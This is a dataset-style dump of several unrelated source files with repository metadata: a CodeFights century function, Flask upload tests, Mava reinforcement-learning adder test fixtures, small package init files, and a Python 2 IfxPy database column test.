Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
def centuryFromYear(year):
return int(year / 100) if (year % 100 == 0) else int(year / 100) + 1
| 33.333333
| 72
| 0.63
| 16
| 100
| 3.9375
| 0.625
| 0.333333
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141026
| 0.22
| 100
| 2
| 73
| 50
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5d799d284c312e29a30c8a091a947b825f1b4cdf
| 7,116
|
py
|
Python
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 2
|
2019-05-04T08:23:28.000Z
|
2019-07-03T21:53:13.000Z
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 7
|
2019-05-01T12:28:17.000Z
|
2019-05-26T14:51:42.000Z
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 3
|
2019-05-01T14:01:36.000Z
|
2020-10-13T05:07:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
import pytest
import os
from flask import url_for
from app.db_entities.data_view import Data
from app.db_entities.files_view import Files
from app.schemas.data_schema import DataSchema
from tests.t_data import testData, testFilenames, count_lines
class TestPut:
@pytest.mark.parametrize('file, values_list', [pytest.param(Files(filename=fn), testData) for fn in testFilenames])
def test_empty_request_put(self, client, db_session, file, values_list):
db_session.add(file)
db_session.commit()
assert db_session.query(Files).all() == [file]
samples = []
data_schema = DataSchema()
for values in values_list:
values['fileid'] = file.fileid
sample = data_schema.load(values, session=db_session, partial=True).data
assert isinstance(sample, Data)
samples.append(sample)
db_session.add(sample)
db_session.commit()
assert db_session.query(Data).all() == samples
assert client.put(url_for('data_handler.change_file', fileid=file.fileid)).status_code == 400
assert client.put(url_for('data_handler.change_file', fileid=file.fileid + 1)).status_code == 404
assert db_session.query(Files).all() == [file]
assert db_session.query(Data).all() == samples
@pytest.mark.parametrize('uploadedfile, filepath', [
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/only_title.csv"),
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/no_data.csv"),
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/image.jpg"),
])
def test_bad_body_put(self, client, db_session, uploadedfile, filepath):
post_resp = client.post(url_for('data_handler.upload_file'),
data={'file': (uploadedfile, os.path.basename(uploadedfile))})
assert post_resp.status_code == 200
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.update_file', fileid=post_resp.get_json()['fileid']),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 400
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
@pytest.mark.parametrize('file, values_list, filepath', [
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data_2.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/medium_data.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data_cp1251.csv"),
])
def test_good_body_put(self, client, db_session, file, values_list, filepath):
assert client.get(url_for('data_handler.file_info', fileid=1)).status_code == 404
db_session.add(file)
db_session.commit()
assert db_session.query(Files).all() == [file]
samples = []
data_schema = DataSchema()
for values in values_list:
values['fileid'] = file.fileid
sample = data_schema.load(values, session=db_session, partial=True).data
assert isinstance(sample, Data)
samples.append(sample)
db_session.add(sample)
db_session.commit()
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.change_file', fileid=file.fileid),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 204
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=file.fileid))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(filepath) - 1
assert get_resp.get_json()['fileid'] == file.fileid
assert get_resp.get_json()['filename'] == os.path.basename(filepath)
@pytest.mark.parametrize('uploadedfile, filepath', [
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data_2.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/medium_data.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data_cp1251.csv"),
])
def test_good_intersect_put(self, client, db_session, uploadedfile, filepath):
post_resp = client.post(url_for('data_handler.upload_file'),
data={'file': (uploadedfile, os.path.basename(uploadedfile))})
assert post_resp.status_code == 200
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.change_file', fileid=post_resp.get_json()['fileid']),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 204
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(filepath) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(filepath)
| 58.327869
| 119
| 0.676082
| 945
| 7,116
| 4.837037
| 0.103704
| 0.061037
| 0.060162
| 0.086633
| 0.913367
| 0.907241
| 0.888427
| 0.872457
| 0.85583
| 0.844454
| 0
| 0.011925
| 0.186903
| 7,116
| 121
| 120
| 58.809917
| 0.778085
| 0.004778
| 0
| 0.696429
| 0
| 0
| 0.190537
| 0.148164
| 0
| 0
| 0
| 0
| 0.419643
| 1
| 0.035714
| false
| 0
| 0.0625
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d7e026ba33682331bd7e21e2c30b5f1c1a53293
| 30,732
|
py
|
Python
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 337
|
2021-07-06T09:09:56.000Z
|
2022-03-30T21:42:37.000Z
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 125
|
2021-07-12T11:38:37.000Z
|
2022-03-30T19:22:53.000Z
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 43
|
2021-07-06T19:44:37.000Z
|
2022-03-07T09:29:07.000Z
|
import dm_env
import numpy as np
from mava.adders.reverb import base
from mava.utils.wrapper_utils import parameterized_restart, parameterized_termination
# TODO Clean this up, when using newer versions of acme.
try:
from acme.adders.reverb.sequence import EndBehavior
except ImportError:
from acme.adders.reverb.sequence import EndOfEpisodeBehavior as EndBehavior
agents = {"agent_0", "agent_1", "agent_2"}
reward_step1 = {"agent_0": 0.0, "agent_1": 0.0, "agent_2": 1.0}
reward_step2 = {"agent_0": 1.0, "agent_1": 0.0, "agent_2": 0.0}
reward_step3 = {"agent_0": 0.0, "agent_1": 1.0, "agent_2": 0.0}
reward_step4 = {"agent_0": 1.0, "agent_1": 1.0, "agent_2": 1.0}
reward_step5 = {"agent_0": -1.0, "agent_1": -1.0, "agent_2": -1.0}
reward_step6 = {"agent_0": 0.5, "agent_1": -5.0, "agent_2": 1.0}
reward_step7 = {"agent_0": 1.0, "agent_1": 3.0, "agent_2": 1.0}
obs_first = {agent: np.array([0.0, 1.0]) for agent in agents}
obs_step1 = {agent: np.array([1.0, 2.0]) for agent in agents}
obs_step2 = {agent: np.array([2.0, 3.0]) for agent in agents}
obs_step3 = {agent: np.array([3.0, 4.0]) for agent in agents}
obs_step4 = {agent: np.array([4.0, 5.0]) for agent in agents}
obs_step5 = {agent: np.array([5.0, 6.0]) for agent in agents}
obs_step6 = {agent: np.array([6.0, 7.0]) for agent in agents}
obs_step7 = {agent: np.array([7.0, 8.0]) for agent in agents}
default_discount = {agent: 1.0 for agent in agents}
default_action = {agent: 0.0 for agent in agents}
env_restart = parameterized_restart(
reward={agent: 0.0 for agent in agents},
discount=default_discount,
observation=obs_first,
)
final_step_discount = {agent: 0.0 for agent in agents}
TEST_CASES = [
dict(
testcase_name="ShortEpsPeriodOne",
sequence_length=3,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneWithExtras",
sequence_length=3,
period=1,
first=(env_restart, {"state": -1}),
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
{"state": 0},
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
{"state": 1},
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
{"state": 2},
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
{"state": 3},
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first,
default_action,
reward_step1,
default_discount,
True,
{"state": -1},
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
default_discount,
False,
{"state": 0},
),
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
],
[
base.Trajectory(
obs_step1,
default_action,
reward_step2,
default_discount,
False,
{"state": 0},
),
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{"state": 2},
),
],
[
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{"state": 2},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{"state": 3},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTermination",
sequence_length=3,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTerminationWithPadding",
sequence_length=4,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
base.Trajectory(
{
agent: np.zeros_like(obs_step2[list(agents)[0]])
for agent in agents
},
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTerminationNoPadding",
sequence_length=4,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.TRUNCATE,
),
dict(
testcase_name="ShortEpsPeriodTwo",
sequence_length=3,
period=2,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="LongEpsPadding",
sequence_length=3,
period=3,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step6,
observation=obs_step6,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step7,
observation=obs_step7,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5, default_action, reward_step6, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step6,
default_action,
reward_step7,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step7,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
{
agent: np.zeros_like(obs_step7[list(agents)[0]])
for agent in agents
},
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="LongEpsNoPadding",
sequence_length=3,
period=3,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step6,
observation=obs_step6,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step7,
observation=obs_step7,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5, default_action, reward_step6, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step6,
default_action,
reward_step7,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step7,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.TRUNCATE,
),
dict(
testcase_name="LongEpsContinuePeriodTwo",
sequence_length=3,
period=2,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step6,
observation=obs_step6,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
[
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
],
[
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
],
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.CONTINUE,
repeat_episode_times=3,
),
]
| 32.798292
| 88
| 0.408825
| 2,162
| 30,732
| 5.513876
| 0.045791
| 0.130862
| 0.112658
| 0.09412
| 0.923161
| 0.919638
| 0.893801
| 0.884154
| 0.876688
| 0.873668
| 0
| 0.027708
| 0.517343
| 30,732
| 936
| 89
| 32.833333
| 0.775972
| 0.02281
| 0
| 0.869281
| 0
| 0
| 0.015723
| 0.005663
| 0
| 0
| 0
| 0.001068
| 0
| 1
| 0
| false
| 0
| 0.007625
| 0
| 0.007625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5deab6a285b38f24c9a56f2541b1b99e1dc8dd90
| 118
|
py
|
Python
|
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
"MIT"
] | 7
|
2021-05-08T04:02:17.000Z
|
2022-03-21T10:53:02.000Z
|
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
"MIT"
] | null | null | null |
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
"MIT"
] | 4
|
2021-11-26T02:20:57.000Z
|
2022-01-07T09:47:59.000Z
|
import sys
sys.path.extend(['atari_utils', 'a2c_ppo_acktr'])
sys.path.extend(['../atari_utils', '../a2c_ppo_acktr'])
| 23.6
| 55
| 0.70339
| 18
| 118
| 4.277778
| 0.5
| 0.181818
| 0.337662
| 0.467532
| 0.883117
| 0.883117
| 0.883117
| 0.883117
| 0
| 0
| 0
| 0.018018
| 0.059322
| 118
| 4
| 56
| 29.5
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0.457627
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
5df0b426f175c3fb9b3f15be096d5c28d36be3e3
| 87
|
py
|
Python
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 1
|
2021-11-22T08:45:15.000Z
|
2021-11-22T08:45:15.000Z
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 12
|
2021-11-03T16:36:57.000Z
|
2022-03-21T20:36:44.000Z
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 1
|
2022-03-02T20:16:00.000Z
|
2022-03-02T20:16:00.000Z
|
from .core import plot_spectrum_from_tally
from .core import plot_spectrum_from_values
| 29
| 43
| 0.885057
| 14
| 87
| 5.071429
| 0.5
| 0.225352
| 0.394366
| 0.507042
| 0.84507
| 0.84507
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091954
| 87
| 2
| 44
| 43.5
| 0.898734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
f8df9eb83692414545170c75158e301ed5aabb6e
| 2,244
|
py
|
Python
|
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
#
#
#
import unittest, sys
import IfxPy
import config
from testfunctions import IfxPyTestFunctions
class IfxPyTestCase(unittest.TestCase):
def test_008_ColumnInfo(self):
obj = IfxPyTestFunctions()
obj.assert_expect(self.run_test_008)
def run_test_008(self):
op = {IfxPy.ATTR_CASE: IfxPy.CASE_NATURAL}
conn = IfxPy.connect(config.ConnStr, config.user, config.password, op)
server = IfxPy.server_info( conn )
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
op = {IfxPy.ATTR_CASE: IfxPy.CASE_UPPER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
